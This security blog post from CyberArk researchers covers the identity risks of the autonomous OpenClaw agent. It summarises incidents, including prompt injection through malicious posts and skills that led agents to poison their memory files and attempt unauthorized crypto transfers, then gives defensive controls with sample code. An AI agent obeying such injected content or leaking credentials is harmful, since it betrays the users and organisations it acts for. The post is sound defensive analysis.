How autonomous AI agents like OpenClaw are reshaping enterprise identity security

February 6, 2026 Lavi Lazarovitz and Mark Cherp


The viral surge of OpenClaw (formerly Clawdbot and Moltbot) has captured the tech world’s imagination, amassing over 160,000 GitHub stars and driving a hardware rush for Mac Minis to host these 24/7 assistants. Dubbed “Claude with hands,” OpenClaw marks a significant shift: AI is moving from a helpful, nominally obedient assistant to a powerful autonomous agent that manages email, executes terminal commands, and interacts with apps like WhatsApp, Slack, and GitHub. These unpredictable, privileged entities act on behalf of their human creators and hold the keys to their digital kingdom, and that combination is a significant risk.

For users, OpenClaw is a powerful productivity tool. For enterprise CISOs, it is a live-fire exercise on a new identity security attack surface: traditional perimeters dissolve as autonomous entities operate with user-level permissions but without human-level predictability. It also exhibits the lethal trifecta of AI agent risk, a term coined by security researcher Simon Willison for an agent that combines access to private data, exposure to untrusted content, and the ability to communicate externally. OpenClaw adds a fourth ingredient: the authority to act on the user’s behalf.

Imagine a developer accessing their OpenClaw environment from an enterprise machine, or deploying it inside the corporate network to integrate with Slack, Teams, or Salesforce. Either move creates a high-risk gateway in which an autonomous agent operates outside the oversight of traditional identity and access management (IAM) controls. Without restricted access and rigorous identity management, a single logic lapse or exploit can cascade into a large-scale identity compromise and data leak, handing the keys to the digital kingdom to an attacker through a process no one vetted.

The OpenClaw dangers: A wake-up call for enterprises

While OpenClaw promises local-first privacy, its rapid adoption has revealed critical security gaps that threaten the integrity of its autonomous ecosystem.

Security researcher Mav Levin of DepthFirst discovered a one-click RCE (CVE-2026-25253), in which a malicious link triggers a WebSocket handshake that leaks tokens and executes arbitrary shell commands.

A Wiz team led by Gal Nagli uncovered a misconfigured database in the Moltbook social network that exposed 1.5 million API keys, 35,000 user emails, and private messages. Nagli’s research also revealed that only 17,000 identities controlled the 1.5 million bots.

An audit of 2,857 skills on the ClawHub marketplace by Koi Security identified 341 malicious entries. This included 335 skills from the ClawHavoc campaign designed to deploy infostealers such as Atomic Stealer.

Security researchers at Permiso identified prompt-injection attacks that manipulated agents into poisoning their own internal memory files and attempting unauthorized cryptocurrency transactions via malicious posts on Moltbook and unvetted skills on ClawHub.

These issues are likely only the tip of the iceberg and carry frightening implications for identity security because OpenClaw agents operate with delegated authority. This means a single compromised skill or injected prompt can hijack a user’s entire digital persona to sign legal documents, access bank accounts, or impersonate them across the web.

Together, these incidents show the broader identity security challenge that arises when autonomous agents act with significant authority, and how quickly the risk can spread across an environment. The next section maps that risk onto three pressure points that shape the identity security attack surface for autonomous agents in enterprise environments.


Mapping the identity security attack surface of autonomous agents

As these AI agents drift into corporate environments, often as “shadow AI” deployed by employees, they create three distinct pressure points:

1. Endpoint privilege and the “God Mode” fallacy: OpenClaw often requires high-level privileges to be useful. In an enterprise context, an agent on a developer’s laptop could inherit the ability to read SSH (Secure Shell) keys or modify source code at machine speed.

2. Exposed secrets and the token goldmine: Agents are hungry for credentials and often store sensitive API keys in .env files or local directories. OpenClaw adds the risk of cognitive context theft by storing MEMORY.md and SOUL.md in plaintext: whoever can read those files learns the agent’s persona and accumulated memory, and whoever can write them can reshape its behavior.

3. Access, permissions, and in-session behavior: Traditional IAM is designed for humans, but AI agents are non-deterministic. An agent inherits the user’s permissions but may execute actions the user never intended.

Agentic AI security: Best practices and mitigations

OpenClaw is a harbinger of the agentic future. While currently in a viral experimentation phase, it could very well provide a blueprint for the autonomous bots that will eventually become foundational to enterprise operations.

Although these tools are not yet production-ready, developers, who are traditionally early adopters with a keen sense of exploration, are likely to deploy them locally now to automate complex workflows. Without proper mitigations, these “shadow” deployments allow agents to operate with high-level privileges, inheriting access to SSH keys and internal codebases before security teams can establish oversight.

Furthermore, even if the agent is not hosted locally, accessing an external deployment UI from within the enterprise creates a direct path for exfiltrating sensitive secrets and tokens to unauthorized third-party environments.

To address these risks effectively, organizations can structure their defenses around the same three areas described above: endpoint privilege, exposure of sensitive information, and access behavior. The following recommendations align with those three areas.

Endpoint privilege: The “God Mode” fallacy

To defend against privilege escalation, organizations can use these controls:

  • Sandbox isolation: Run agents like OpenClaw in a hardened container (for example, Docker with a read-only root filesystem, dropped capabilities, and no host mounts) or a dedicated virtual machine, so they cannot reach the host’s root filesystem or SSH keys.
  • Command and filesystem allow-listing: Configure explicit lists of authorized terminal commands and directory paths the agent can interact with, rather than granting open-ended access.
  • The surgical kill switch: Maintain the technical capability to immediately suspend an agent’s local identity and kill its active processes without disrupting the broader human user’s session.
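The command and filesystem allow-listing and the kill switch described above can be combined into one policy gate that an agent host consults before every shell or filesystem tool call. The following is an added example, not OpenClaw's own code; the allowed command set, the workspace root and the denied directories (~/.ssh, ~/.aws, /etc) are assumptions chosen for illustration. It resolves symlinks and `..` before checking a path, refuses any command line containing shell metacharacters, accepts only bare command names from the allow-list, and refuses everything once the agent identity has been suspended.

```python
"""Added example, not OpenClaw's own code: a policy gate that an agent host
could place in front of every shell and filesystem tool call. It enforces an
explicit command allow-list, a directory allow-list (with symlinks and '..'
resolved before the check), a deny-list for secret stores, and a kill switch
that refuses everything once the agent's local identity is suspended.
"""
from __future__ import annotations

import os
import shlex
from dataclasses import dataclass
from pathlib import Path

# Shell metacharacters: if any is present we cannot reason about a single argv,
# so the call is refused outright rather than parsed optimistically.
SHELL_META = set(";&|`$<>\n")


def _norm(raw: str) -> Path:
    # Expand ~ and resolve symlinks and '..' so the real target is judged.
    return Path(os.path.expanduser(raw)).resolve()


@dataclass
class AgentPolicy:
    allowed_commands: frozenset[str]
    allowed_roots: tuple[Path, ...]
    denied_roots: tuple[Path, ...] = ()
    suspended: bool = False

    def __post_init__(self) -> None:
        # Resolve roots once so /tmp vs /private/tmp style symlinks compare equal.
        self.allowed_roots = tuple(_norm(str(r)) for r in self.allowed_roots)
        self.denied_roots = tuple(_norm(str(r)) for r in self.denied_roots)

    def kill(self) -> None:
        """Kill switch: suspend this agent identity; the human session is untouched."""
        self.suspended = True

    @staticmethod
    def _under(path: Path, roots: tuple[Path, ...]) -> bool:
        return any(path == r or r in path.parents for r in roots)

    def check_path(self, raw: str) -> tuple[bool, str]:
        if self.suspended:
            return False, "agent suspended"
        # '/work/../etc/passwd' or a symlink into ~/.ssh is caught even though
        # the literal string starts inside the workspace.
        p = _norm(raw)
        if self._under(p, self.denied_roots):
            return False, f"{p}: denied location"
        if not self._under(p, self.allowed_roots):
            return False, f"{p}: outside allowed roots"
        return True, "ok"

    def check_command(self, cmdline: str) -> tuple[bool, str]:
        if self.suspended:
            return False, "agent suspended"
        if SHELL_META & set(cmdline):
            return False, "shell metacharacters are not allowed"
        try:
            argv = shlex.split(cmdline)
        except ValueError as exc:
            return False, f"unparseable command: {exc}"
        if not argv:
            return False, "empty command"
        # Only bare names from the allow-list; '/tmp/x/git' or '../git' would
        # let the agent (or an injected prompt) substitute its own binary.
        if os.sep in argv[0] or argv[0] not in self.allowed_commands:
            return False, f"command not allowed: {argv[0]}"
        for arg in argv[1:]:
            if arg.startswith(("/", "~", ".")) or os.sep in arg:
                ok, why = self.check_path(arg)
                if not ok:
                    return False, why
        return True, "ok"


def default_policy(workspace: str) -> AgentPolicy:
    """Assumed baseline: a few dev tools, one workspace, secret stores denied."""
    return AgentPolicy(
        allowed_commands=frozenset({"git", "ls", "cat", "grep", "python3", "npm"}),
        allowed_roots=(Path(workspace),),
        denied_roots=(Path("~/.ssh"), Path("~/.aws"), Path("/etc")),
    )


if __name__ == "__main__":
    policy = default_policy("/tmp/agent-work")
    for cmd in ("git status", "cat ~/.ssh/id_ed25519", "ls /tmp/agent-work/../../etc",
                "curl https://evil.example/x", "ls; curl https://evil.example/x"):
        print(f"{cmd!r:45} -> {policy.check_command(cmd)}")
    policy.kill()
    print("after kill:", policy.check_command("git status"))
```

The gate is deliberately conservative: an argument that merely looks like a path is checked, and anything it cannot parse into a single argv is refused rather than guessed at. Denied roots are tested before allowed roots, so a symlink planted inside the workspace that points at ~/.ssh is still refused.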

Exposed secrets: The token goldmine

To reduce the risk of exposure from secrets sprawl, teams should take these steps:

  • Secrets rotation and injection: Implement automated rotation for all keys the agent uses. Rather than storing credentials in plaintext files (like .env), inject them into the agent’s environment at runtime.
  • Scoped and ephemeral tokens: Transition away from “full access” tokens. Use short-lived, task-specific credentials that automatically expire, limiting the window of opportunity for an attacker who might compromise the agent’s memory.
  • Proxy hardening: Configure host-side proxies to enforce network-level egress allow-listing. This ensures that even if an agent is tricked into stealing secrets, it cannot exfiltrate them to an unauthorized external domain.
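The runtime injection, redaction and egress allow-listing recommended above can be shown end to end. The following is an added example, not OpenClaw's own code: the secret names, the sample token values and the egress allow-list (api.github.com and slack.com) are constructed for illustration, and fetching the secrets from a vault (and rotating them) is assumed to happen before `build_task_env()` is called. The child "task" receives only the secrets named for it, anything written to memory or log files passes through `redact()`, and the egress check uses a real URL parser so that user-info tricks, plain http, look-alike subdomains and raw IP literals are all refused.

```python
"""Added example, not OpenClaw's own code: inject only the secrets a task needs
into a child process at runtime instead of leaving them in .env files, redact
secret values before anything is written to memory or log files, and enforce
an egress allow-list with a real URL parser. Secret values and the allow-list
below are constructed for illustration.
"""
from __future__ import annotations

import ipaddress
import os
import subprocess
import sys
from urllib.parse import urlsplit

# Assumed egress allow-list for an agent that talks to GitHub and Slack only.
EGRESS_ALLOW = frozenset({"api.github.com", "slack.com"})


def build_task_env(secrets: dict[str, str], needed: list[str]) -> dict[str, str]:
    """Minimal environment for one task: PATH plus only the named secrets."""
    missing = [n for n in needed if n not in secrets]
    if missing:
        raise KeyError(f"secrets not available for this task: {missing}")
    env = {"PATH": os.environ.get("PATH", "/usr/bin:/bin")}
    env.update({n: secrets[n] for n in needed})
    return env


def run_with_injected_secrets(code: str, secrets: dict[str, str], needed: list[str]) -> str:
    """Run a Python snippet as the 'agent task' with a scoped environment only.

    The parent keeps the full secret set; the child sees just 'needed', and
    nothing is written to disk. Returns the child's stdout.
    """
    env = build_task_env(secrets, needed)
    out = subprocess.run([sys.executable, "-c", code], env=env,
                         capture_output=True, text=True, check=True)
    return out.stdout


def redact(text: str, secrets: dict[str, str]) -> str:
    """Replace every secret value before text reaches MEMORY.md-style files or logs.

    Longest values first, so a value that is a prefix of another cannot leave
    a partial secret behind.
    """
    for name, value in sorted(secrets.items(), key=lambda kv: -len(kv[1])):
        if value:
            text = text.replace(value, f"[REDACTED:{name}]")
    return text


def egress_allowed(url: str, allowed_hosts: frozenset[str]) -> bool:
    """Host-level egress check that survives the usual URL tricks.

    - https only
    - hostname comes from the parser, so 'https://api.github.com@evil.example/'
      is judged by its real host (evil.example), not by a substring match
    - case and trailing dot normalised; exact match or a subdomain of an entry
    - no raw IP literals (they bypass name-based allow-lists)
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".").lower()
    if parts.scheme != "https" or not host:
        return False
    try:
        ipaddress.ip_address(host)
        return False
    except ValueError:
        pass
    return any(host == h or host.endswith("." + h) for h in allowed_hosts)


if __name__ == "__main__":
    # Constructed sample secrets; in practice these come from a vault at runtime.
    secrets = {"GITHUB_TOKEN": "ghp_constructed123", "SLACK_TOKEN": "xoxb-constructed456"}
    print(run_with_injected_secrets(
        "import os; print(sorted(k for k in os.environ if k.endswith('_TOKEN')))",
        secrets, ["GITHUB_TOKEN"]))
    print(redact("agent note: pushed with ghp_constructed123", secrets))
    for url in ("https://api.github.com/repos", "https://api.github.com@evil.example/",
                "http://slack.com/", "https://93.184.216.34/"):
        print(url, egress_allowed(url, EGRESS_ALLOW))
```

In a real deployment the same allow-list would be enforced at the proxy or egress firewall, not only in the agent process, since a compromised agent can skip an in-process check; the function here shows which normalisations that enforcement point has to perform.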

Access: Permissions and in-session behavior

Ensuring secure access for autonomous systems requires:

  • Zero standing privileges (ZSP): Adopt a just-in-time (JIT) access model where agents are granted permissions only for the specific duration of a task, ensuring they have no permanent access to sensitive databases or apps.
  • Authenticated delegation: Move away from impersonation. Use OAuth-style delegation that links every agent’s action back to the human creator, requiring out-of-band (OOB) authentication (like a push notification) for high-risk or destructive actions.
  • Session monitoring and discovery: Maintain a continuous inventory of all “shadow AI” agents. Use real-time observability to link non-deterministic agent behavior to the human user’s identity for clear auditability and risk scoring.
  • Least privilege: Restrict the agent’s functional scope by defining “read-only” roles for data analysis tasks and strictly requiring human-in-the-loop (HITL) approval before the agent can modify system files or execute financial transactions.
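Zero standing privileges, authenticated delegation, human-in-the-loop approval and auditability can be modelled in a single grant broker. The following is an added example, not OpenClaw's own code or any vendor's product: the HMAC key, the scope names, the risk tiers and the approval freshness window are assumptions for illustration. A human principal issues a short-lived, scoped, signed grant to an agent; each action is checked for signature, expiry and scope; high-risk actions additionally require an out-of-band approval by the same human, bound to that action and recent; and every decision is appended to an audit log that names the human behind the agent.

```python
"""Added example, not OpenClaw's own code: zero-standing-privilege grants for
an agent. A human principal issues a short-lived, scoped, HMAC-signed grant;
every action is checked against signature, expiry and scope; high-risk actions
also need an out-of-band approval bound to that action by the same human; and
every decision is written to an audit log that names the human behind the
agent. Key, scope names and risk tiers are assumed for illustration.
"""
from __future__ import annotations

import hashlib
import hmac
import json
from dataclasses import dataclass, replace

# Assumed: the issuer key lives with the IAM/JIT broker, never with the agent.
BROKER_KEY = b"constructed-broker-key-do-not-use-in-production"

# Assumed risk tiers; 'high' actions need human-in-the-loop approval.
RISK = {"read:repo": "low", "read:crm": "low", "write:repo": "high",
        "delete:file": "high", "pay:transfer": "high"}

APPROVAL_MAX_AGE = 300  # seconds an out-of-band approval stays usable


@dataclass(frozen=True)
class Grant:
    principal: str          # the human the agent acts for
    agent_id: str
    scopes: tuple[str, ...]
    issued_at: int
    expires_at: int
    signature: str = ""


@dataclass(frozen=True)
class Approval:
    approver: str
    action: str
    approved_at: int


def _sign(grant: Grant) -> str:
    # Canonical JSON over every field except the signature itself.
    body = json.dumps({"principal": grant.principal, "agent_id": grant.agent_id,
                       "scopes": grant.scopes, "issued_at": grant.issued_at,
                       "expires_at": grant.expires_at},
                      sort_keys=True, separators=(",", ":"))
    return hmac.new(BROKER_KEY, body.encode(), hashlib.sha256).hexdigest()


def issue_grant(principal: str, agent_id: str, scopes: list[str], ttl_s: int, now: int) -> Grant:
    """JIT issuance: permissions exist only for ttl_s seconds and only for these scopes."""
    g = Grant(principal, agent_id, tuple(sorted(scopes)), now, now + ttl_s)
    return replace(g, signature=_sign(g))


def authorize(grant: Grant, action: str, now: int, approval: Approval | None,
              audit: list[dict]) -> tuple[bool, str]:
    """Decide one agent action and append an audit record linking it to the human."""
    def decide(ok: bool, why: str) -> tuple[bool, str]:
        audit.append({"at": now, "principal": grant.principal, "agent": grant.agent_id,
                      "action": action, "allowed": ok, "reason": why})
        return ok, why

    # The agent holds the grant, so it must not be able to edit its own expiry.
    if not hmac.compare_digest(grant.signature, _sign(grant)):
        return decide(False, "grant signature invalid (tampered or forged)")
    if now >= grant.expires_at:
        return decide(False, "grant expired")
    if action not in grant.scopes:
        return decide(False, f"{action} not in granted scopes")
    if RISK.get(action, "high") == "high":
        if approval is None:
            return decide(False, "high-risk action needs human approval")
        if approval.approver != grant.principal or approval.action != action:
            return decide(False, "approval does not match principal and action")
        if not (0 <= now - approval.approved_at <= APPROVAL_MAX_AGE):
            return decide(False, "approval stale")
    return decide(True, "allowed")


if __name__ == "__main__":
    log: list[dict] = []
    g = issue_grant("alice@example.com", "openclaw-laptop-01",
                    ["read:repo", "write:repo"], ttl_s=900, now=1_000_000)
    print(authorize(g, "read:repo", 1_000_100, None, log))
    print(authorize(g, "write:repo", 1_000_100, None, log))
    print(authorize(g, "write:repo", 1_000_100,
                    Approval("alice@example.com", "write:repo", 1_000_050), log))
    print(authorize(g, "read:repo", 1_000_900, None, log))
    for entry in log:
        print(entry)
```

Two details carry the identity point: the grant names the human principal, so every audit record can be attributed to a person rather than to an opaque bot, and the approval must come from that same principal for that exact action, so a prompt-injected agent cannot reuse an approval granted for something else.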

These issues make it clear that OpenClaw offers an early view of the identity-focused risks that will appear as autonomous agents become more common in enterprise environments.

OpenClaw’s signal to enterprises: AI agent security must start now

OpenClaw’s tooling itself isn’t enterprise-grade, but it still offers a useful blueprint for understanding how autonomous agents can affect enterprise security. The unmanaged spread of OpenClaw and Moltbook shows how quickly identity‑focused risks develop when agents operate with broad permissions and unpredictable behavior. To secure this frontier, enterprises must proactively prevent agents from inheriting excessive local privileges, which would let them exfiltrate SSH keys, modify system files, or access sensitive data by moving outside their intended sandbox.

By enforcing modern identity security controls like zero standing privileges, using secrets management to eliminate plaintext secrets, and requiring human-in-the-loop approval for high-risk actions, CISOs can strengthen the security and auditability of AI agent activity, even as their systems evolve from simple assistants into the fully autonomous digital workers of the future.

Lavi Lazarovitz is vice president of cyber research, and Mark Cherp is the director of security research at CyberArk Labs.

